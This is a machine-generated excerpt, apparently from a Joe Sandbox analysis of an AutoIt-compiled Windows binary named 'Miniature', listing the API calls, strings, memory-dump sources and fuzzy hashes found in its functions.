                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                            • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00C51B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00C5194E
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00C519D1
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00C51B7B,?,00C51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00C51A64
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00C51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00C51A7B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C43B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C36A79,?,0000015D,?,?,?,?,00C385B0,000000FF,00000000,?,?), ref: 00C43BC5
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00C51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00C51AF7
                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C51B22
                                                                                                                                                                                                                                                                                            • __freea.LIBCMT ref: 00C51B2E
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                            • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00C81C1B
                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C81C43
                                                                                                                                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00C81C67
                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C81C97
                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C81D1E
                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C81D83
                                                                                                                                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00C81DEF
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C943C8
                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00C944D7
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C944E7
                                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C9467C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C8169E: VariantInit.OLEAUT32(00000000), ref: 00C816DE
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C8169E: VariantCopy.OLEAUT32(?,?), ref: 00C816E7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C8169E: VariantClear.OLEAUT32(?), ref: 00C816F3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                                            • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C708FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C70831,80070057,?,?,?,00C70C4E), ref: 00C7091B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C708FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C70831,80070057,?,?), ref: 00C70936
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C708FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C70831,80070057,?,?), ref: 00C70944
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C708FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00C70831,80070057,?), ref: 00C70954
                                                                                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00C956AE
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C957B6
                                                                                                                                                                                                                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00C9582C
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 00C95837
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                                            • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                            • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenu.USER32(?), ref: 00CA2C1F
                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 00CA2C51
                                                                                                                                                                                                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CA2C79
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA2CAF
                                                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00CA2CE9
                                                                                                                                                                                                                                                                                            • GetSubMenu.USER32(?,?), ref: 00CA2CF7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C74393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C743AD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C74393: GetCurrentThreadId.KERNEL32 ref: 00C743B4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C74393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C72F00), ref: 00C743BB
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CA2D7F
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7F292: Sleep.KERNEL32 ref: 00C7F30A
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 00CA8992
                                                                                                                                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00CA899E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00CA8A79
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00CA8AAC
                                                                                                                                                                                                                                                                                            • IsDlgButtonChecked.USER32(?,00000000), ref: 00CA8AE4
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 00CA8B06
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00CA8B1E
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 64bb6f2134d774a45e532b92228f30fceb96320fe73ef95999389c29015b6c6c
                                                                                                                                                                                                                                                                                            • Instruction ID: eba1882c47c7e1f2c154d9d184138ecba285cca328dfa632f934c859b20da0f1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64bb6f2134d774a45e532b92228f30fceb96320fe73ef95999389c29015b6c6c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A719174600246AFDB259F65CC84FFABBB9FF0A308F140459F86557291CB31AE49EB11
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 00C7B8C0
                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C7B8D5
                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00C7B936
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C7B964
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C7B983
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C7B9C4
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C7B9E7
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c6976de3345a7748263ec122264d8cc942957bc3fcd67a300d88ab8c6c91ff83
                                                                                                                                                                                                                                                                                            • Instruction ID: d24911b7c19512cc7c366903ba4cf91b7ffac06fc848f514bfd4588004e65695
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c6976de3345a7748263ec122264d8cc942957bc3fcd67a300d88ab8c6c91ff83
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB51C1A06087D53EFB3652348855BBABEA95B06704F08C489F2ED468D2C3D8AEC4E751
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetParent.USER32(00000000), ref: 00C7B6E0
                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00C7B6F5
                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00C7B756
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C7B782
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C7B79F
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C7B7DE
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C7B7FF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ac19a48d9e0abe0f0b54b84edca9e0b7582f7b90842cf5950215dfcb97afc3cc
                                                                                                                                                                                                                                                                                            • Instruction ID: 01fe53b92ce745be2e51aec323f522cc9d3e2393e4e62c73642536139f01d7d5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac19a48d9e0abe0f0b54b84edca9e0b7582f7b90842cf5950215dfcb97afc3cc
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B551E3A09046D53EFB368274CC56B7ABEA95B46304F0CC489F1ED4A8D2D394EE84E761
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00C45F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00C457E3
                                                                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 00C4585E
                                                                                                                                                                                                                                                                                            • __fassign.LIBCMT ref: 00C45879
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00C4589F
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,00C45F16,00000000,?,?,?,?,?,?,?,?,?,00C45F16,?), ref: 00C458BE
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,00C45F16,00000000,?,?,?,?,?,?,?,?,?,00C45F16,?), ref: 00C458F7
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 1bd64265d0cdc6b8ad99aae03056b61c4c984023cba3d458b217198bb2c950e7
                                                                                                                                                                                                                                                                                            • Instruction ID: 657a635ec3ad28411c84967f5c3886f361c82df7b8bb990277f8e2c6fa962808
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bd64265d0cdc6b8ad99aae03056b61c4c984023cba3d458b217198bb2c950e7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9851B771904649DFDB10CFA8D885BEEBBF8FF19320F14411AE956E7292D7309A41CB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00C330BB
                                                                                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00C330C3
                                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00C33151
                                                                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00C3317C
                                                                                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00C331D1
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                            • Opcode ID: 67a8eafe7c1acf42b0ce91225c8c960c0cecf9074bac5c6381b07e67b4abc3c9
                                                                                                                                                                                                                                                                                            • Instruction ID: fbda3ce0075cbcb491d837acb5a6ac9927dcc7c489e9d2bd822309e9074fa583
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67a8eafe7c1acf42b0ce91225c8c960c0cecf9074bac5c6381b07e67b4abc3c9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B241C334E202889BCF10DF68C885BAEBBB5AF44324F148155EC25AB392D735EB05CB91
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C93AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C93AD7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C93AAB: _wcslen.LIBCMT ref: 00C93AF8
                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C91B6F
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C91B7E
                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C91C26
                                                                                                                                                                                                                                                                                            • closesocket.WSOCK32(00000000), ref: 00C91C56
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 95d171bba974fe5eb9b843f1705bc55420df68a69cf42350bd476746f70204d8
                                                                                                                                                                                                                                                                                            • Instruction ID: d772182c9c6620397401684dee921a7db613a2335e378210b092abd8b259e91e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95d171bba974fe5eb9b843f1705bc55420df68a69cf42350bd476746f70204d8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4241B671600115AFDB109F64C889BADB7E9EF45324F188059FC169B292D774EE81CBE1
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C7D7CD,?), ref: 00C7E714
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C7D7CD,?), ref: 00C7E72D
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00C7D7F0
                                                                                                                                                                                                                                                                                            • MoveFileW.KERNEL32(?,?), ref: 00C7D82A
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7D8B0
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C7D8C6
                                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?), ref: 00C7D90C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                                                            • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                                            • Opcode ID: d5b3ec44cf9d989a960fc487df091ec8f1f99972bb7b5f17561fd6ba785aafbf
                                                                                                                                                                                                                                                                                            • Instruction ID: fe6d81088b3b2a34ddfd3571934ff65de3b1b5a648b8862567ea1558afff2f71
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5b3ec44cf9d989a960fc487df091ec8f1f99972bb7b5f17561fd6ba785aafbf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F4199718052189EDF12EFA4D981FDD77B8AF08340F0040E6E50EEB181EB35A788DB51
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00CA38B8
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CA38EB
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CA3920
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00CA3952
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00CA397C
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00CA398D
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CA39A7
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C780D0
                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C780F6
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00C780F9
                                                                                                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 00C78117
                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00C78120
